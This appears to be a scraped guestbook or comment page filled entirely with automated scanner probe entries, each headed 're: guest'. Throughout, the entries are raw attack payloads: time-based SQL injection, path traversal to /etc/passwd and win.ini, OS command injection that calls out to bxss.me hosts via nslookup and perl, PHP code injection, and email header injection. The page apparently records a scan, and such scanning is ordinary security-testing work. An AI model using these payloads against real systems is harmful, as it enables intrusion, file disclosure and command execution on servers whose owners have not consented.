U2svrtk9')) OR 851=(SELECT 851 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@a62oC
re: guest
1Qhyhys6O
re: guest
response.write(9973836*9739615)
re: guest
%0abcc:074625.67-16660.67.8501f.19990.2@bxss.me
re: guest
'+response.write(9973836*9739615)+'
re: guest
to@example.com>%0d%0abcc:074625.67-16661.67.8501f.19990.2@bxss.me
re: guest
"+response.write(9973836*9739615)+"
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${10000044+9999541}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
)
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
'.gethostbyname(lc('hitmv'.'gzeillscd43dd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(71).chr(106).chr(86).'
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
^(#$!@#$)(()))******
re: guest
".gethostbyname(lc("hitfw"."riewwhrt629f3.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(70).chr(97).chr(89)."
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
echo nlblia$()\ gapdxr\nz^xyu||a #' &echo nlblia$()\ gapdxr\nz^xyu||a #|" &echo nlblia$()\ gapdxr\nz^xyu||a #
re: guest
/etc/passwd
re: guest
&echo lclbny$()\ rwvnnf\nz^xyu||a #' &echo lclbny$()\ rwvnnf\nz^xyu||a #|" &echo lclbny$()\ rwvnnf\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo afnfjh$()\ apbxfn\nz^xyu||a #' |echo afnfjh$()\ apbxfn\nz^xyu||a #|" |echo afnfjh$()\ apbxfn\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: guest
(nslookup hitjqasgejddkf9755.bxss.me||perl -e "gethostbyname('hitjqasgejddkf9755.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: guest
$(nslookup hitaffywogpig10c3c.bxss.me||perl -e "gethostbyname('hitaffywogpig10c3c.bxss.me')")
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(120).concat(88).concat(103).concat(68)+(require"socket"
Socket.gethostbyname("hitvr"+"pgksfryue0814.bxss.me.")[3].to_s)+"
re: guest
Http://bxss.me/t/fit.txt
re: guest
&nslookup hitgrlaaermnb71faa.bxss.me&'\"`0&nslookup hitgrlaaermnb71faa.bxss.me&`'
re: guest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: guest
bxss.me/t/xss.html?%00
re: guest
'+'A'.concat(70-3).concat(22*4).concat(99).concat(84).concat(100).concat(74)+(require'socket'
Socket.gethostbyname('hitdo'+'jicqesfqf761d.bxss.me.')[3].to_s)+'
re: guest
http://bxss.me/t/fit.txt%3F.jpg
re: guest
&(nslookup hitsrsxaxzhur96227.bxss.me||perl -e "gethostbyname('hitsrsxaxzhur96227.bxss.me')")&'\"`0&(nslookup hitsrsxaxzhur96227.bxss.me||perl -e "gethostbyname('hitsrsxaxzhur96227.bxss.me')")&`'
re: guest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: guest
/etc/shells
re: guest
|(nslookup hityzyexvqcfl4ac79.bxss.me||perl -e "gethostbyname('hityzyexvqcfl4ac79.bxss.me')")
re: guest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: guest
c:/windows/win.ini
re: guest
`(nslookup hitqxvznxqmdz1f7b2.bxss.me||perl -e "gethostbyname('hitqxvznxqmdz1f7b2.bxss.me')")`
re: guest
file:///etc/passwd
re: guest
bxss.me
re: guest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: guest
;(nslookup hitsbqwpvygfj01e83.bxss.me||perl -e "gethostbyname('hitsbqwpvygfj01e83.bxss.me')")|(nslookup hitsbqwpvygfj01e83.bxss.me||perl -e "gethostbyname('hitsbqwpvygfj01e83.bxss.me')")&(nslookup hitsbqwpvygfj01e83.bxss.me||perl -e "gethostbyname('hitsbqwpvygfj01e83.bxss.me')")
re: guest
/\../\../\../\../\../\../\../etc/passwd
re: guest
/WEB-INF/web.xml
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
C:\WINDOWS\system32\drivers\etc\hosts
re: guest
';print(md5(31337));$a='
re: guest
../../../../../../../../../../windows/win.ini%00.jpg
re: guest
";print(md5(31337));$a="
re: guest
/../../../../../../../../../../boot.ini
re: guest
${@print(md5(31337))}
re: guest
'"
re: guest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: guest
${@print(md5(31337))}\
re: guest
<!--
re: guest
..\..\..\..\..\..\..\..\windows\win.ini
re: guest
'.print(md5(31337)).'
re: guest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: guest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: guest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: guest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: guest
WEB-INF/web.xml
re: guest
WEB-INF\web.xml
re: guest
1
re: guest
1
re: guest
-1 OR 2+540-540-1=0+0+0+1 --
re: guest
-1 OR 3+540-540-1=0+0+0+1 --
re: guest
-1 OR 2+537-537-1=0+0+0+1
re: guest
-1 OR 3+537-537-1=0+0+0+1
re: guest
-1' OR 2+907-907-1=0+0+0+1 --
re: guest
-1' OR 3+907-907-1=0+0+0+1 --
re: guest
-1' OR 2+388-388-1=0+0+0+1 or 'RE3hxYqh'='
re: guest
-1' OR 3+388-388-1=0+0+0+1 or 'RE3hxYqh'='
re: guest
-1" OR 2+299-299-1=0+0+0+1 --
re: guest
-1" OR 3+299-299-1=0+0+0+1 --
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
mKg7lKFI'; waitfor delay '0:0:15' --
re: guest
-5 OR 102=(SELECT 102 FROM PG_SLEEP(15))--
re: guest
-5) OR 398=(SELECT 398 FROM PG_SLEEP(15))--
re: guest
-1)) OR 869=(SELECT 869 FROM PG_SLEEP(15))--
re: guest
GSRcWGqe' OR 749=(SELECT 749 FROM PG_SLEEP(15))--
re: guest
RFlIXm45') OR 487=(SELECT 487 FROM PG_SLEEP(15))--
re: guest
VggWKK8r')) OR 867=(SELECT 867 FROM PG_SLEEP(15))--
re: guest
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@tJr3M